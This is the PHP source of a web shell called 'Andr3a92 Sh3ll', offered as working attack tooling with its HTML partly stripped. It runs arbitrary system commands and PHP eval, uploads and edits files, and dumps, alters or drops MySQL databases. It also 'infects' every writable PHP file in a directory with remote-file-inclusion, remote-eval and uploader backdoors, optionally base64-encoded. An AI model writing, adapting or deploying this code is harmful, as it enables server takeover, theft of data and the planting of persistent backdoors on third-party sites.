File: \'; } else{ $temporaney = $_FILES[\'file\'][\'tmp_name\']; $upload = $_FILES[\'file\'][\'name\']; if(move_uploaded_file($temporaney,$upload)) echo \'File uppato!\'; else echo \'File non uppato!\'; }}?>' ); $evilcode_base64 = array( "rfi" => '', "eval_remote_file" => '', "eval" => '', "uploader" => '' ); } if($safe == 0){ if(!fwrite($fp,"\n\r".$evilcode[$mode])) return FALSE; else return TRUE; } else{ if(!fwrite($fp,"\n\r".$evilcode_base64[$mode])) return FALSE; else return TRUE; } fclose($fp); } else return FALSE; } $infected_files = array(); /* global infector*/ function infect_files($mode,$dir_ = '',$safe = 0){ global $infected_files; if($dir_ != "") chdir($dir_); foreach(glob("*.php") as $file){ if(is_writable($file) && $file != basename($shell)){ if(infect_file($file,$mode,$safe)) $infected_files[] = $file; } } } /*Mysql dump*/ function dump_table($table,$continue = 0,$add_db_name = 1) { if($continue == 0){ $result = "# Dump by Andr3a92 Sh3ll\n"; if($add_db_name == 0) $result .= "# Dump of database ".$_COOKIE['db']."\n"; $result .= "# Dump DATE : " . date("d-M-Y") ."\n\n"; $result .= "# Dump of $table \n"; } else $result = "# Dump of $table \n"; $table_create = mysql_query("SHOW CREATE TABLE $table"); $table_row = mysql_fetch_array($table_create); $result .= $table_row[1]."\n\n"; $query = mysql_query("SELECT * FROM $table"); $num_fields = @mysql_num_fields($query); $numrow = mysql_num_rows($query); $all_fields = ""; for($cr = 0; $cr < $num_fields; $cr++){ $name = mysql_field_name($query,$cr); $all_fields .= "`".$name."`"; if($cr < ($num_fields -1)) $all_fields .= ","; } for ($a = 0; $a < $numrow; $a++){ $row = mysql_fetch_row($query); $result .= "INSERT INTO ".$table."(".$all_fields.") VALUES("; for($b = 0; $b < $num_fields; $b++) { $row[$b] = addslashes($row[$b]); $row[$b] = ereg_replace("\n","\\n",$row[$b]); if (isset($row[$b])) $result .= "'$row[$b]'" ; else $result .= "\"\""; if ($b < ($num_fields-1)) $result .= ","; } $result .= ");\n"; } return $result . "\n\n"; } /* dump only a table */ function dump_db_table($host,$username,$password,$database,$table,$dump_file){ if(mysql_connect($host,$username,$password)){ if(mysql_select_db($database)){ $dump = dump_table($table,0); if($dump_file == "" || $dump_file == ".sql") $dump_file = gen_filename('dump_'.$table.'_'.date("d_M_Y").'.sql'); else $dump_file = gen_filename($dump_file); if($dump != ""){ $fp = fopen($dump_file,"x+"); if(fwrite($fp,$dump)) echo "Dump done successfull!"; else echo "An error occured! Cannot create dump file!"; fclose($fp); } else echo "An error occured! No dump generated!"; } else{ mysql_close(); echo "An error occurted! Could not select the database called ".htmlspecialchars($database)."!"; } } else{ mysql_close(); echo "An error occurted! Could not login ".htmlspecialchars($username)." @ ".htmlspecialchars($host)."!"; } } /* Db dump */ function dump_db($host,$username,$password,$database,$dump_file){ if(mysql_connect($host,$username,$password)){ if(mysql_select_db($database)){ $dump = ""; $show = mysql_query("SHOW TABLES"); $a = 0; while($row = mysql_fetch_array($show)){ $dump .= dump_table($row[0],$a,$a); $a++; } mysql_close(); if($dump_file == "" || $dump_file == ".sql") $dump_file = gen_filename('dump_'.date("d_M_Y").'.sql'); else $dump_file = gen_filename($dump_file); if($dump != ""){ $fp = fopen($dump_file,"x+"); if(fwrite($fp,$dump)) echo "Dump done successfull!"; else echo "An error occured! Cannot create dump file!"; fclose($fp); } else echo "An error occured! No dump generated!"; } else{ mysql_close(); echo "An error occurted! Could not select the database called ".htmlspecialchars($database)."!"; } } else{ mysql_close(); echo "An error occurted! Could not login ".htmlspecialchars($username)." @ ".htmlspecialchars($host)."!"; } } /* no duplicate filenames */ function gen_filename($filename){ if(is_file($filename)){ $exp = explode(".",$filename); $filename = ""; for($a = 0; $a < count($exp) - 1; $a++) $filename .= $exp[$a]; $filename .= "_2.".$exp[count($exp)-1]; if(is_file($filename)) return gen_filename($filename); else return $filename; } else return $filename; } /*size of file in b , KB, MB*/ function format_num($num){ if($num < 1024){ $totalnum = $num." b"; } elseif($num >= 1024 AND $num < 1048576){ $to_divide = $num / 1024; $num_total = number_format($to_divide, 2, '.', ''); $totalnum = $num_total." KB"; } elseif($num >= 1048576 AND $num < 1073741824){ $to_divide = $num / 1048576; $num_total = number_format($to_divide, 2, '.', ''); $totalnum = $num_total." MB"; } elseif($num >= 1073741824){ $to_divide = $num / 1073741824; $num_total = number_format($to_divide, 2, '.', ''); $totalnum = $num_total." GB"; } return $totalnum; } /* decimal semplification */ function format_num_($num){ if(strpos($num,".") !== FALSE){ $num = explode(".",$num); $dec = $num[1]; if($dec[0] > 5) $num = $num[0] + 1; else $num = $num[0]; } else $num = $num; return $num; } /*size of file in b , KB, MB*/ function totalsize($filesize){ $size = filesize($filesize); $totalsize = format_num($size); return $totalsize; } /*remove a dir and all file inside it*/ function rmdirr($dir_rm) { if($internal = @glob($dir_rm."/*")){ foreach($internal as $file) { if(is_file($file)) @unlink($file); elseif(is_dir($file)) rmdirr($file); } } @rmdir($dir_rm); } /*file permissions*/ function getperms($f) { $mode = fileperms($f); $perm = ""; $perm .= ($mode & 00400) ? 'r' : '-'; $perm .= ($mode & 00200) ? 'w' : '-'; $perm .= ($mode & 00100) ? 'x' : '-'; $perm .= ($mode & 00040) ? 'r' : '-'; $perm .= ($mode & 00020) ? 'w' : '-'; $perm .= ($mode & 00010) ? 'x' : '-'; $perm .= ($mode & 00004) ? 'r' : '-'; $perm .= ($mode & 00002) ? 'w' : '-'; $perm .= ($mode & 00001) ? 'x' : '-'; return $perm; } // Zip functions /*zip vars*/ $datasec = array(); $ctrl_dir = array(); $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; $old_offset = 0; $zip_error = array(); /* convert time */ function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980){ $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } /*gen file in archive*/ function add_File($data, $name, $time = 0){ global $datasec; global $ctrl_dir; global $old_offset; $name = str_replace('\\', '/', $name); $dtime = dechex(unix2DosTime($time)); $hexdtime = '\x'.$dtime[6].$dtime[7].'\x'.$dtime[4].$dtime[5].'\x'.$dtime[2].$dtime[3].'\x'.$dtime[0].$dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len).pack('v', strlen($name)).pack('v', 0).$name.$zdata.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); $datasec[] = $fr; $new_offset = strlen(implode('', $datasec)); $cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00".$hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len).pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 ).pack('v', 0 ).pack('v', 0 ).pack('V', 32 ).pack('V', $old_offset ); $old_offset = $new_offset; $cdrec .= $name; $ctrl_dir[] = $cdrec; } /* gen file contents*/ function gen_file(){ global $eof_ctrl_dir; global $datasec; global $ctrl_dir; $data = implode('', $datasec); $ctrldir = implode('', $ctrl_dir); return $data . $ctrldir . $eof_ctrl_dir . pack('v', sizeof($ctrl_dir)) . pack('v', sizeof($ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; } /* add a file */ function addFile($file) { if (file_exists($file)) add_File(implode('',file($file)),$file); else zip_error($file,1); } /* add dir */ function addDir($dira,$path = -1) { if (file_exists($dira)) { if ($path == -1) $path = $dira; $dir_ = opendir($dira); if(readdir($dir_)){ while ($file = readdir($dir_)) { add_File(implode('',file($dira."/".$file)),$path."/".$file); } } } else zip_error($dira,2); } /* add all file in a dir*/ function PackDir($dira = ''){ $current_dir = getcwd(); if($dira != '') chdir($dira); $row = array(); foreach(glob("*") as $file){ $row[] = $file; } chdir($current_dir); for($a = 0; $a < count($row); $a++){ if($row[$a] != "." && $row[$a] != ".."){ if($dira != ''){ if(is_dir($dira."/".$row[$a])) PackDir($dira."/".$row[$a]); else addFile($dira."/".$row[$a]); } else{ if(is_dir($row[$a])) PackDir($row[$a]); else addFile($row[$a]); } } } } /* create archive */ $name_zip = ""; function create_zip($file,$dir_zip = '') { global $zip_error; global $name_zip; PackDir($dir_zip); $file = gen_filename($file); $name_zip = $file; $fp = fopen($file,'a+'); fwrite($fp,gen_file()); fclose($fp); if($zip_error[0] != "") return false; else return true; } /* errors of zip */ function zip_error($name,$type){ global $zip_error; if($type == 1) $type = "file"; elseif($type == 2) $type = "directory"; $zip_error[] = "Error adding ".$type." ".$name; } // All Informations: /*ip address*/ $ip = $_SERVER['REMOTE_ADDR']; /*site referer*/ $referer = $_SERVER['HTTP_REFERER']; if($referer == "") $referer = "null"; /*shell location*/ $shell_location = getcwd(); /*ip of server*/ $server_ip = $_SERVER['SERVER_ADDR']; /*useragent*/ $useragent = htmlspecialchars($_SERVER["HTTP_USER_AGENT"]); /*server software*/ $server_software = $_SERVER['SERVER_SOFTWARE']; /*uname*/ $uname = php_uname(); /*document root*/ $doc_root = $_SERVER['DOCUMENT_ROOT']; /*magic_quotes_gpc*/ if(ini_get("magic_quotes_gpc") != 0) $magic_quotes_gpc = "On"; elseif(ini_get("magic_quotes_gpc") == 0)$magic_quotes_gpc = "Off"; /*safe mode*/ if(ini_get("safe_mode") == 0)$safe_mode = "Off"; elseif(ini_get("safe_mode") != "0")$safe_mode = "On"; /*register globals*/ if(ini_get("register_globals") == "1")$registerglobals = "On"; elseif(ini_get("register_globals") != "1")$registerglobals = "Off"; /*Space free*/ $freespace = format_num(disk_free_space(getcwd())); /*Total space*/ $totalspace = format_num(disk_total_space(getcwd())); /* Used space */ $usedspace = format_num(disk_total_space(getcwd()) - disk_free_space(getcwd())); /* % free space */ $percentfreespace = format_num_((disk_free_space(getcwd()) * 100) / disk_total_space(getcwd())); /* % used space */ $percentusedspace = 100 - $percentfreespace; //GET vars /*dir location*/ $dir = htmlspecialchars($_POST['dir']); /*dir actions*/ $dirdelete = htmlspecialchars($_POST['dirdelete']); $dirrename = htmlspecialchars($_POST['dirrename']); /*file actions*/ $filedelete = htmlspecialchars($_POST['filedelete']); $fileopen = htmlspecialchars($_POST['fileopen']); $fileedit = htmlspecialchars($_POST['fileedit']); $filerename = htmlspecialchars($_POST['filerename']); $filecopy = htmlspecialchars($_POST['filecopy']); $infectfile = htmlspecialchars($_POST['infectfile']); $infectdir = htmlspecialchars($_POST['infectdir']); /*Actions*/ $action = htmlspecialchars($_POST['action']); /* chmod var */ $chmod = htmlspecialchars($_POST['chmod']); if($dir != ""){ if($strip_all) $dir = stripslashes($dir); chdir($dir); $dir = getcwd(); } else $dir = getcwd(); if(is_file($shell_location."/".md5('andr3a92'))) $lk = "unlock"; else $lk = "lock"; echo "
"; if($lk == "unlock") echo ""; echo "
Andr3a92 Sh3ll ~ Info
"; if(strtolower(substr(PHP_OS,0,3)) == "win"){ echo ""; } echo "
Server Info
   Server ip: ".$server_ip."
   Server software: ".$server_software."
   Uname -a: ".$uname."
   Total space: ".$totalspace."
   Used space: ".$usedspace." [ ".$percentusedspace."% ]
   Free space: ".$freespace." [ ".$percentfreespace."% ]
Your Info
   Your ip: ".$ip."
   Useragent: ".$useragent."
Generic Info
   Site referer: ".$referer."
   Current dir: ".$dir."
   Shell location: ".$shell_location."
   Document root: ".$doc_root."
   Shell name: ".$shell."
   Safe mode: ".$safe_mode."
   Register Globals: ".$registerglobals."
   Magic Quotes: ".$magic_quotes_gpc."
Chdir
"; foreach(range("A","Z") as $letter){ if($letter == "A") echo ''; else{ if(is_dir($letter.":\\")) echo ''; } } echo "
[ A ]
[ '.$letter.' ]
   Dir path:

Andr3a92 Sh3ll ~ Tools
Upload a file
Make a directory
Execute a command
Make a file
Connect to database
Eval PHP code
Infect a file
Infect directory
View PHP Info
Zip this dir
Unistall
X
"; //To upload a file if($action == "upload"){ echo ""; elseif(isset($_POST['upload'])){ $temporaney = $_FILES['file']['tmp_name']; $upload = $_FILES['file']['name']; if(move_uploaded_file($temporaney,$upload)) echo "File uploaded Succesfull"; else echo "Error!
The file was not uploaded!"; echo "
 "; } } elseif($action == "unistall"){ if(!isset($_POST['confirm'])){ echo ""; } else{ $s = basename($shell); // if(unlink($s)) echo ""; // else echo ""; } } // To infect a file elseif($action == "infectfile"){ if(!isset($_POST['infect'])){ echo "

File:
"; if(!isset($_POST['upload'])) echo "

Good bye! Thank's for use this shell!
 

Cannot delete this shell!
 
Andr3a92 Sh3ll ~ Infect File

File name:


Infection type:


Base64 crypt:

RFI: remote file inclusion.
Usage: infectedpage.php?rfi=[LINK SHELL]


"; } else{ echo "
Andr3a92 Sh3ll ~ Infect File

"; if($_POST['base64'] != ""){ $safe = 1; $buse = "yes"; } else{ $safe = 0; $buse = "no"; } if(infect_file($_POST['filename'],$_POST['mode'],$safe)) echo 'File '.htmlspecialchars($_POST['filename']).' infected with '.htmlspecialchars($_POST['mode']).', using base64: '.$buse.'!'; else 'Error! This file cannot be infected!'; echo "
 
"; } echo '
'; } //to infect a dir if($action == "infectdir"){ if(!isset($_POST['infect'])){ echo "
Andr3a92 Sh3ll ~ Infect Files

Dir name (Leave blank if you want to infect current dir):


Infection type:


Base64 crypt:

RFI: remote file inclusion.
Usage: infectedpage.php?rfi=[LINK SHELL]


"; } else{ echo "
Andr3a92 Sh3ll ~ Infect Files

"; if($_POST['dirname'] != "" && is_dir($_POST['dirname'])) $dirname = $_POST['dirname']; else $dirname = ""; if($_POST['base64'] != "") $safe = 1; else $safe = 0; infect_files($_POST['mode'],$dirname,$safe); for($a = 0; $a < count($infected_files); $a++) echo 'File '.htmlspecialchars($infected_files[$a]).' infected with '.htmlspecialchars($_POST['mode']).'!
'; echo "
"; } echo '
'; } // To eval a code elseif($action == "eval"){ if(!isset($_POST['feval'])) echo "

PHP code:




 "; else{ echo "
"; if($strip_all) eval(stripslashes($_POST['eval'])); else eval($_POST['eval']); echo "
 "; } } //To make a directory elseif($action == "md"){ echo "
Directory's name:
"; if(isset($_POST['makedir'])){ if(!is_dir($_POST['dirname'])){ $dir_name = htmlspecialchars($_POST['dirname']); if(mkdir($dir_name)) echo "Directory ".htmlspecialchars($_POST['dirname'])." created succesfull!"; else echo "Error!
Directory ".htmlspecialchars($_POST['dirname'])." cannot be created!"; } else echo "Error!
Directory ".htmlspecialchars($_POST['dirname'])." already exists!"; echo "
 "; } echo "
"; } //Execute a command elseif($action == "exe"){ echo "
Command: "; else document.getElementById("div").innerHTML="";'
"; if(!isset($_POST['execute'])) echo "
 "; elseif(isset($_POST['execute'])){ Switch($_POST['method']){ Case 'shell_exec': if($strip_all) echo "Response: ".shell_exec(stripslashes($_POST['command'])); else echo "Response: ".shell_exec($_POST['command']); break; Case 'exec': if($strip_all) echo "Response: ".exec(stripslashes($_POST['command'])); else echo "Response: ".exec($_POST['command']); break; Case 'system': if($strip_all) echo "Response: ".system(stripslashes($_POST['command']),$return)."
Return value: ".$return; else echo "Response: ".system($_POST['command'],$return)."
Return value: ".$return; break; Case 'passthru': if($strip_all) echo "Response: ".passthru(stripslashes($_POST['command'])); else echo "Response: ".passthru($_POST['command']); break; Case 'popen': if($strip_all) echo "Response: ".popen(stripslashes($_POST['command']),stripslashes($_POST['mode'])); else echo "Response: ".popen($_POST['command'],$_POST['mode']); break; } echo "
 "; } } //To create a file elseif($action == "mf"){ if(!isset($_POST['fcreate'])) echo "
Name file:


Contents:


"; elseif(isset($_POST['fcreate'])){ if(!is_file($_POST['fname'])){ $fp_to = htmlspecialchars($_POST['fname']); $fp = fopen($fp_to , "x+"); if($strip_all) $fp_contents = stripslashes($_POST['contentsfp']); else $fp_contents = $_POST['contentsfp']; fwrite($fp , $fp_contents); fclose($fp); if(file_exists($fp_to)) echo "
File ".$fp_to." created succesfull!
 
"; else echo "
Error!
This file cannot be created!
 
"; } else echo "
Error!
This file already exists!
 
"; } } elseif($action == "connect"){ if(!isset($_COOKIE['username']) || !isset($_COOKIE['password']) || !isset($_COOKIE['host']) || !isset($_COOKIE['db'])){ if(!isset($_POST['form'])){ echo "
Andr3a92 Sh3ll ~ Connect

"; echo "Host:


"; echo "Username:


"; echo "Password:


"; echo "Database:


"; echo "
 
"; } else{ foreach($_POST as $k => $v){ setcookie($k,$v); } echo '
'; } } else{ $act = htmlspecialchars($_POST['act_mysql']); echo "
Andr3a92 Sh3ll ~ Database '".htmlspecialchars($_COOKIE['db'])."'
"; if($act != "dump" && $act != "makequery"){ if(mysql_connect($_COOKIE['host'],$_COOKIE['username'],$_COOKIE['password'])){ if(mysql_select_db($_COOKIE['db'])){ $show = mysql_query("SHOW TABLES"); echo ""; $a = 0; while($row = mysql_fetch_array($show)){ echo ""; $a++; } echo "
".$row[0]."
"; if($act == "view"){ echo ""; if($strip_all) $table = stripslashes($_POST['query']); else $table = $_POST['query']; $select = mysql_query("SELECT * FROM `".$table."`"); for($cr = 0; $cr < mysql_num_fields($select); $cr++){ $name = mysql_field_name($select,$cr); echo ""; } echo ""; $n = array(); $a = 0; while ($row = mysql_fetch_array($select, MYSQL_ASSOC)) { echo ""; $rl = 0; foreach ($row as $k=>$v) { $n[$rl] = $v; if($v == "") $v = " "; echo ""; $rl++; } $del = ""; for($cr = 0; $cr < mysql_num_fields($select); $cr++){ $name = mysql_field_name($select,$cr); $del .= "`".mysql_real_escape_string($name)."` = '".mysql_real_escape_string($n[$cr])."'"; if($cr+1 < mysql_num_fields($select)) $del .= " AND "; } echo ""; $a++; } echo "
".$name."Action
".$v."


"; if($dir != "") echo ""; echo "
"; } elseif($act == "delete"){ if(!isset($_POST['confirm'])){ echo "
"; } else{ echo "
"; if($strip_all) $query = stripslashes($_POST['query']); else $query = $_POST['query']; if(mysql_query($query)) echo "Deleted successfull!"; else echo "Error!Cannot delete this value!"; echo "
"; } } elseif($act == "deletetable"){ if(!isset($_POST['confirm'])){ echo "
"; } else{ echo "
"; if($strip_all) $query = stripslashes($_POST['table']); else $query = $_POST['table']; if(mysql_query("DROP TABLE `".$query."`")) echo "Table ".$query." deleted successfull!"; else echo "Error!Cannot delete table ".$query."!"; echo "
"; } } elseif($act == "truncate"){ if(!isset($_POST['confirm'])){ echo "
"; } else{ echo "
"; if($strip_all) $query = stripslashes($_POST['table']); else $query = $_POST['table']; if(mysql_query("TRUNCATE TABLE `".$query."`")) echo "Table ".$query." truncated successfull!"; else echo "Error!Cannot truncate table ".$query."!"; echo "
"; } } elseif($act == "edit"){ if(!isset($_POST['edit_camp'])){ if($strip_all) $space = mysql_query(stripslashes($_POST['query'])); else $space = mysql_query($_POST['query']); $row = mysql_fetch_array($space, MYSQL_ASSOC); echo "
"; for($cr = 0; $cr < mysql_num_fields($space); $cr++){ $name = mysql_field_name($space,$cr); echo ""; } echo ""; $rl = 0; $n = array(); $r = array(); foreach ($row as $k=>$v) { $n[$rl] = $k; $r[$rl] = $v; $rl++; } for($a = 0; $a < count($n); $a++) echo ""; echo "
".$name."

"; } else{ $table = $_POST['table']; if($strip_all) $query = mysql_query(stripslashes($_POST['query'])); else $query = mysql_query($_POST['query']); if($strip_all) $exp = explode("WHERE ",stripslashes($_POST['query'])); else $exp = explode("WHERE ",$_POST['query']); $row = mysql_fetch_array($query, MYSQL_ASSOC); if($strip_all) $update .= "UPDATE ".stripslashes($table)." SET "; else $update .= "UPDATE ".$table." SET "; $cr = 0; foreach ($row as $k=>$v) { if($strip_all) $update .= "`".stripslashes($k)."` = '".stripslashes($_POST[$k])."'"; else $update .= "`".$k."` = '".$_POST[$k]."'"; if($cr+1 < mysql_num_fields($query)) $update .= " , "; $cr++; } if($strip_all) $update .= " WHERE ".stripslashes($exp[1]); else $update .= " WHERE ".$exp[1]; if(mysql_query($update)) echo "Edited succesfull!"; else echo "Error!Cannot edit this value!"; echo ""; } echo "
"; } elseif($act == "insert"){ if(!isset($_POST['my_insr'])){ if($strip_all) $select = mysql_query("SELECT * FROM `".stripslashes($_POST['table'])."`"); else $select = mysql_query("SELECT * FROM `".$_POST['table']."`"); $n = array(); for($a = 0; $a < mysql_num_fields($select); $a++) $n[$a] = mysql_field_name($select,$a); echo "
"; for($a = 0; $a < count($n); $a++) echo ""; echo ""; for($a = 0; $a < count($n); $a++) echo ""; echo "
".$n[$a]."

"; echo "
"; } else{ if($strip_all) $select = mysql_query("SELECT * FROM `".stripslashes($_POST['table'])."`"); else $select = mysql_query("SELECT * FROM `".$_POST['table']."`"); $n = array(); for($a = 0; $a < mysql_num_fields($select); $a++) $n[$a] = mysql_field_name($select,$a); $query = "INSERT INTO `".$_POST['table']."`(`"; for($a = 0; $a < count($n); $a++){ $query .= $n[$a]."`"; if($a < count($n) -1) $query .= ",`"; } $query .= ") VALUES('"; for($a = 0; $a < count($n); $a++){ $query .= addslashes($_POST[$n[$a]])."'"; if($a < count($n) -1) $query .= ",'"; } $query .= ")"; if(mysql_query($query)) echo "Inserted succesfull!"; else echo "Error!"; } echo ""; } else echo ""; mysql_close(); } else{ mysql_close(); echo "An error occurted! Could not select the database called ".htmlspecialchars($_COOKIE['db'])."!"; setcookie("username","",time() - 3600); setcookie("password","",time() - 3600); setcookie("host","",time() - 3600); setcookie("db","",time() - 3600); echo ''; } } else{ mysql_close(); echo "An error occurted! Could not login ".htmlspecialchars($_COOKIE['username'])." @ ".htmlspecialchars($_COOKIE['host'])."!"; setcookie("username","",time() - 3600); setcookie("password","",time() - 3600); setcookie("host","",time() - 3600); setcookie("db","",time() - 3600); echo ''; } } else{ echo "

"; if($act == "dump"){ if($_POST['dump_table'] != ""){ if(!isset($_POST['dump'])){ echo "
Dump file name(leave blank for default!):


"; } else dump_db_table($_COOKIE['host'],$_COOKIE['username'],$_COOKIE['password'],$_COOKIE['db'],$_POST['dump_table'],$_POST['dump_file'].".sql"); } else{ if(!isset($_POST['dump'])) echo "
Dump file name(leave blank for default!):


"; else dump_db($_COOKIE['host'],$_COOKIE['username'],$_COOKIE['password'],$_COOKIE['db'],$_POST['dump_file'].".sql"); } } else{ if(!isset($_POST['doquery'])) echo "
SQL code:



"; else{ if(mysql_connect($_COOKIE['host'],$_COOKIE['username'],$_COOKIE['password'])){ if(mysql_select_db($_COOKIE['db'])){ if($strip_all) $query = stripslashes($_POST['eval']); else $query = $_POST['eval']; if(mysql_query($query)) echo 'Query executed!'; else echo ''.mysql_error().''; mysql_close(); } else{ mysql_close(); echo "An error occurted! Could not select the database called ".htmlspecialchars($_COOKIE['db'])."!"; setcookie("username","",time() - 3600); setcookie("password","",time() - 3600); setcookie("host","",time() - 3600); setcookie("db","",time() - 3600); } } else{ mysql_close(); echo "An error occurted! Could not select the database called ".htmlspecialchars($_COOKIE['db'])."!"; setcookie("username","",time() - 3600); setcookie("password","",time() - 3600); setcookie("host","",time() - 3600); setcookie("db","",time() - 3600); } } } echo '

 '; } } } // To create an archive elseif($action == "zip"){ if(isset($_POST['zip_dir'])){ if(!isset($_POST['zip'])) echo "
Archive name:


"; else{ echo "
"; if(create_zip($_POST['archivename'].".zip",$_POST['zip_dir'])) echo "Zip archive '".$name_zip."' created successfull!"; else{ echo "Zip archive '".$name_zip."' created with some errors!
"; for($a = 0; $a < count($zip_error); $a++) echo "".$zip_error[$a]."
"; } echo "
 
"; } } else{ echo ''; if(!isset($_POST['zip'])){ $__dir = array(); $__file = array(); foreach(glob("*") as $f){ if(is_dir($f)) $__dir[] = $f; else $__file[] = $f; } echo '
Archive name:

All Dir  All File  All  Invert selection

'; for($a = 0; $a < count($__dir); $a++) echo ''; for($a = 0; $a < count($__file); $a++) echo ''; echo '
'.$__dir[$a].'
'.$__file[$a].'
'; } else{ $__dir = array(); $__file = array(); foreach($_POST as $k=>$v){ if(eregi("dir__",$k)) $__dir[] = $v; elseif(eregi("file__",$k)) $__file[] = $v; } for($a = 0; $a < count($__dir); $a++) PackDir($__dir[$a]); for($a = 0; $a < count($__file); $a++) addFile($__file[$a]); $file = gen_filename($_POST['archivename'].".zip"); $fp = fopen($file,'x+'); fwrite($fp,gen_file()); fclose($fp); if($zip_error[0] != ""){ echo "Zip archive '".$file."' created with some errors!
"; for($a = 0; $a < count($zip_error); $a++) echo "".$zip_error[$a]."
"; } else echo "Zip archive '".$file."' created successfull!"; } echo '
 '; } } //To delete a file if($filedelete != ""){ if(!isset($_POST['confirm'])){ echo "
"; } else{ echo "
"; if(unlink($filedelete)) echo "
File ".$filedelete." deleted succesfull!"; else echo "
Error!
The file ".$filedelete." cannot be deleted!
Maybe you don't have persmissions for delete this file!"; echo "
 "; } } // To lock this file if($_POST['lockaction'] == "lock"){ echo '
'; if(!isset($_POST['username']) && !isset($_POST['password'])) echo "
Username:
Password:

 "; else{ $file_cont = ""; for($a = 0; $a < 10; $a++) $file_cont .= md5(md5(rand(0,10000000))).'::::'.md5(md5(rand(10000001,2000000)))."\n"; $file_cont .= md5(md5(strtolower($_POST['username'])).'andr3a92').'::::'.md5(md5($_POST['password']).'andr3a92')."\n"; $file_cont .= md5(md5(rand(0,10000000))).'::::'.md5(md5(rand(10000001,2000000))); chdir($shell_location); $fp = fopen(md5('andr3a92'),"a+"); if($fp){ if(fwrite($fp,$file_cont)) echo 'Protection ENABLED!'; else echo 'Could not create protection file!'; } else echo 'Could not create protection file!'; fclose($fp); echo '
 '; } echo '
'; } // To logout from shell if protection is enabled if($_POST['logout'] == 1 && is_file($shell_location."/".md5('andr3a92'))){ setcookie("shell_username","",time() - 3600,"/"); setcookie("shell_password","",time() - 3600,"/"); header("location: ".$shell); } // To unlock this file if($_POST['lockaction'] == "unlock"){ echo '
'; chdir($shell_location); if(unlink(md5('andr3a92'))) echo 'Protection DISABLED!'; else echo 'Could not delete protection file!'; echo '

 '; } //To delete a directory if($dirdelete != ""){ if(!isset($_POST['confirm'])){ echo "
"; } else{ echo "
"; rmdirr($dirdelete); if(!is_dir($dirdelete)) echo "
Directory ".$dirdelete." deleted succesfull!"; elseif(is_dir($dirdelete)) echo "
Error!
The directory ".$dirdelete." cannot be deleted!
Maybe you don't have persmissions for delete this directory!"; echo "
 "; } } //To edit a file if($fileedit != ""){ if(isset($_POST['editfile'])){ if($strip_all) $to_edit = stripslashes($_POST['edit']); else $to_edit = $_POST['edit']; $fp = fopen($fileedit , "w+"); fwrite($fp , $to_edit); fclose($fp); echo "
File edit succesfull!
 

"; } elseif(!isset($_POST['editfile'])){ if(is_writable($fileedit)){ $file_ = htmlspecialchars(join(file($fileedit))); echo "



 "; } else echo "
Error!
This file cannot be edited!
 
"; } } //To open a file if($fileopen != ""){ $file_source = htmlentities(join(file($fileopen))); echo "

 
"; } //To rename a file if($filerename != ""){ if(file_exists($filerename) AND is_file($filerename) AND !isset($_POST['rename'])) echo "
Include format in the new name of this file!

Old name: ".$filerename."

New name:



 "; elseif(isset($_POST['rename']) AND file_exists($filerename) AND is_file($filerename) AND !is_file($_POST['filerename2'])){ if(rename($filerename , htmlspecialchars($_POST['filerename2']))) echo "
File ".$filerename." renamed ".htmlspecialchars($_POST['filerename2'])."

 "; else echo "
Error!
This file cannot be renamed!
 
"; } } //To rename a directory if($dirrename != ""){ if(is_dir($dirrename) AND !isset($_POST['drename'])) echo "
Old name: ".$dirrename."
New name:



 "; elseif(isset($_POST['drename']) AND is_dir($dirrename) AND !is_dir($_POST['dirrename2'])){ if(rename($dirrename , htmlspecialchars($_POST['dirrename2']))) echo "
Directory ".$dirrename." renamed ".htmlspecialchars($_POST['dirrename2'])."

 "; else echo "
Error!
This directory cannot be renamed!
 
"; } } // To copy a file if($filecopy != ""){ if(is_file($filecopy) AND !isset($_POST['fpaste'])) echo "
New name:



 "; elseif(isset($_POST['fpaste']) AND is_file($filecopy) AND !is_file($_POST['filepaste'])){ if(copy($filecopy, htmlspecialchars($_POST['filepaste']))) echo "
File ".$filecopy." pasted as ".htmlspecialchars($_POST['filepaste'])."

 "; else echo "
Error!
This file cannot be pasted!
 
"; } } // to chmod a file if($chmod != ""){ if(!isset($_POST['ch_mod']) && (is_file($chmod) || is_dir($chmod))){ $c = getperms($chmod); echo $c[2]; if($c[0] == "r") $owner_read = 'checked = ""'; if($c[1] == "w") $owner_write = 'checked = ""'; if($c[2] == "x") $owner_execute = 'checked = ""'; if($c[3] == "r") $group_read = 'checked = ""'; if($c[4] == "w") $group_write = 'checked = ""'; if($c[5] == "x") $group_execute = 'checked = ""'; if($c[6] == "r") $other_read = 'checked = ""'; if($c[7] == "w") $other_write = 'checked = ""'; if($c[8] == "x") $other_execute = 'checked = ""'; $num = substr(sprintf('%o', fileperms($chmod)), -4); echo "UserReadWriteExecute
Owner Group Other "; } elseif(isset($_POST['ch_mod']) && (is_file($chmod) || is_dir($chmod))){ $ch_mod = "0".(int)$_POST['t_owner']."".(int)$_POST['t_group']."".(int)$_POST['t_other']; if(chmod($chmod,$ch_mod)) echo ""; else echo ""; } } echo "
Chmod value:   

File ".$chmod." chmodded on ".$ch_mod."

 

Error!
This file cannot be chmodded! Maybe you don't have permissions!
 

Andr3a92 Sh3ll ~ Files
Previous Directory
Principal directory
"; echo "
Home Folder
|
